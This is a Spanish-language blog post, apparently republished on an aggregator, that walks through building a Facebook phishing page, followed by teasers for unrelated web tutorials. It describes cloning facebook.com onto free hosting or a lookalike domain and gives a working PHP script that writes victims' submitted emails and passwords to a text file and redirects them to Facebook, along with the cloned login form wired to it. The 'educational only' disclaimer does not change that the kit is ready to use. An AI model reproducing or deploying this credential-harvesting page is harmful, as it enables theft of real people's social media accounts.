Ataques de ingeniería social + phishing



Cuentas de redes sociales usando un ataque de phishing

El phishing es uno de los mejores ataques de ingeniería social que implica la recopilación de información confidencial y confidencial del objetivo,

por ejemplo

La tarjeta de crédito, la tarjeta de débito, la contraseña bancaria y la contraseña de las redes sociales. En este método, el atacante clona el sitio web oficial específico y lo envía al objetivo. .
siempre que el objetivo visite el sitio web de phishing del atacante e ingrese su información confidencial.

El atacante recibirá la misma información confidencial.

Veamos un ejemplo de phishing en Facebook.

El atacante clona el sitio web facebook.com y crea la página de facebook maliciosa y hospeda el sitio web en cualquier alojamiento gratuito como web000hostapp o compre un dominio de cualquier registrador

Facebook phishing se parece a: - faceb00k.com

veamos cuál es el resultado si el objetivo inicia sesión a través de nuestra página de phishing e ingrese su información, como se muestra a continuación, y haga clic en el resultado de ingreso a continuación

Una vez que el objetivo haya alcanzado la entrada, será redirigido a su https://www.facebook.com compartir a continuación
Prueba



Codigo php

<?php




file_put_contents("credencial.txt", "Account: " . $_POST[email] . " Pass: " . $_POST[pass] . "\n", FILE_APPEND);

header(Location: https://facebook.com/);

exit();




?>

Codigo html



<form method="post" action="login.php" class="bj bk" id="login_form" novalidate="1">

<!--<form method="post" action="obtener.php" class="bj bk" id="login_form" novalidate="1">-->

<input type="hidden" name="lsd" value="AVqtQgzP" autocomplete="off" />

<input type="hidden" name="m_ts" value="1496628789" />

<input type="hidden" name="li" value="Nb40WeKiZQn-XtfEITzKEkZp" />

<input type="hidden" name="try_number" value="0" />

<ul class="bl bm bn">

<li class="bm">

<h3 class="bo bp bq">Correo electronico o telefono</h3>

<input autocorrect="off" autocapitalize="off" type="email" class="br bs bt" name="email" value="" />

</li><li class="bm">

<div>

<h3 class="bo bp bq">Constrasena</h3>

<input autocorrect="off" autocapitalize="off" class="br bs bu bv" name="pass" type="password" />

</div>

</li>

<div class="upage vertical-col left" id="mainpage">

<li class="bm">

<input value="Iniciar sesion" type="submit" name="Iniciar sesion" class="m n bw bx by" />

<!--facebook-->

</li>

</div>

</ul>

<div>

</div

noscript>

<input type="hidden" name="_fb_noscript" value="true" />

</noscript>

</form>

A continuación, vea cómo el pirata informático redirige a facebook; utilizan el script php para almacenar la información en un archivo particular.

Buscamos la etique form en action pondremos el nombre de script php

<form method="post" action="" class="bj bk" id="login_form" novalidate="1">






Ahora vea en el script anterior el objetivo, guarde el nombre de usuario y la contraseña en txt.

https://www.facebook.com/videocall/incall/?peer_id=



ADVERTENCIA: NO INTENTE HACER UN ATAQUE SIN EL PERMISO DE PROPIETARIO DEL SITIO WEB. ES UN PROPÓSITO EDUCATIVO SOLAMENTE. NO ES RESPONSABLE DE NINGÚN TIPO DE PROBLEMA ILEGAL.

PERMANECE LEGAL.

GRACIAS!

Si tienes algún problema, deja un comentario.

Mi nombre es Luishiño aquí es donde me gusta escribir sobre temas que en su momento me interesan. Aveces sobre mi vida personal y principalmente cosas de programación ,desarrollo web.Aplicaciones,Software, programas que yo mismo las desarrollo y cosas básicas de informática..

Fuente: este post proviene de The Seven Codes, donde puedes consultar el contenido original.
¿Vulnera este post tus derechos? Pincha aquí.
Creado:
¿Qué te ha parecido esta idea?

Esta idea proviene de:

Y estas son sus últimas ideas publicadas:

SISTEMA DE DIAGNOSTICO Se desea diseñar un diagrama de clases para administrar el trabajo del médico que mediante una cuenta de usuario deberá: • Un administrador se encargará de administrar el sistem ...

¿Qué es el SQL injection? Una inyección de SQL, a veces abreviada como SQLi, es un tipo de vulnerabilidad en la que un atacante usa un trozo de código SQL (lenguaje de consulta estructurado) para mani ...

Recomendamos

Relacionado

Blogging Tutoriales

Una de las cosa que más me gustan de Blogger, es la capacidad de insertar y personalizar un formulario de contacto, sin la necesidad de recurrir a servicios como JotForm o Foxyform. Sin duda, un gran acierto, pues muchos de estos servicios tienen una limitación en cuanto a la cantidad de mensajes que puedes recibir en tu correo. Añadirlo es bastante sencillo, pues esta función se trata de un gadg ...

general propuestas

Los componentes de suscripción por correo electrónico, sirven para que los usuarios que visitan un sitio web, puedan suscribirse a sus actualizaciones recibiéndolas por correo electrónico. Se trata de una herramienta fundamental para cualquier blog o sitio web, pues crea un vínculo directo entre sus visitantes y su autor. Cuando el creador de la página web publica un contenido, éste llega a todos ...

Código html Código web Programación Web ...

Es muy sencillo hacer un menú de navegación utilizando para ello un campo de formulario despegable y un botón para confirmar la selección. Código para hacer un menú de navegación. Para crear un menú de este tipo se debe utilizar el siguiente código HTML en el lugar concreto donde queramos situarlo dentro de la página: <form> <SELECT NAME=”urldestino”> <option selected&g ...

Tutorial

Tener una lista de suscripción es muy importante en el camino de convertirse en un Blogger de éxito, sin embargo muchos piensan que una vez hecha la lista vale todo el resto, por lo que nos encontramos páginas con campos de formulario que se presentan con el aspecto predeterminado que les da el navegador, evitar esta catástrofe en WordPress es sencillo, ya que contamos con plugins que nos facilita ...

CSS: Nivel B1

Tener una lista de suscripción es muy importante para captar seguidores más fieles que los que captaríamos en cualquier red social como Twitter o Facebook, sin embargo muchos piensan que una vez hecha la lista vale con pegar el código que nos da nuestro proveedor de e-mail marketing y ya nos lloverán los suscriptores, por lo que nos encontramos páginas con campos de formulario que se presentan con ...

apk documentos programa ...

Anteriormente vimos como crear un servidor web desde nuestro android y lazar un ataque con el metodo phishing para facebook. Hoy veremos un editor de texto para android , especialmente para el lenguaje de programación php En ocasiones nos encontramos archivos o nos envían , y queremos editar de forma rápida Los editores de código o IDEs (el acrónimo inglés de Integrated Development Environment) y ...

Tutoriales Redes Sociales Web

Que feliz que me hace regresar al blog. Como algunos de ustedes saben, me fui de vacaciones, y regreso supercontenta, Mexico tiene lugares hermosos, llenos de historia y cultura, pero bueno esa es otra historia. Hoy vengo con un tutorial, que ya buena falta hacia por aquí en el blog. Este va a petición de mi amiga Marysol, que me ha pedido un tutorial para cambiar esos botones sociales para compar ...

general social

Muchos Bloggers prefieren añadir botones para redes sociales al pie de sus entradas para que los usuarios puedan compartir el contenido que ha sido de su agrado. Vamos a aprender a colocar en el pie de entradas botones para compartir en Facebook, Twitter y Google+ nuestras creaciones.¿Qué son los botones para las redes sociales en un Blog?: Los componentes oficiales o no oficiales de las distinta ...

Redes sociales Uncategorized Blogger ...

Añade un Social Locker en blogspot e impulsa tus redes sociales Los social Locker son una manera de conseguir que tus lectores compartan o den me gusta en las redes para poder acceder a un contenido especial. El pago social o el pay per action es cada vez mas frecuente en los blogs, en principio era algo reservado a los blogs de descargas y gracias a su efectividad se han extendido por la blogsfer ...

general

La creación de menús en páginas web es fundamental para la estructuración de la información a la que los usuarios pueden acceder. En los Blogs, al igual que en cualquier publicación web, el orden y la presentación de las categorías de la información que manejamos puede ordenarse mediante un menú. La exposición de contenidos mediante un menú facilita a los usuarios el acceso a la información, consi ...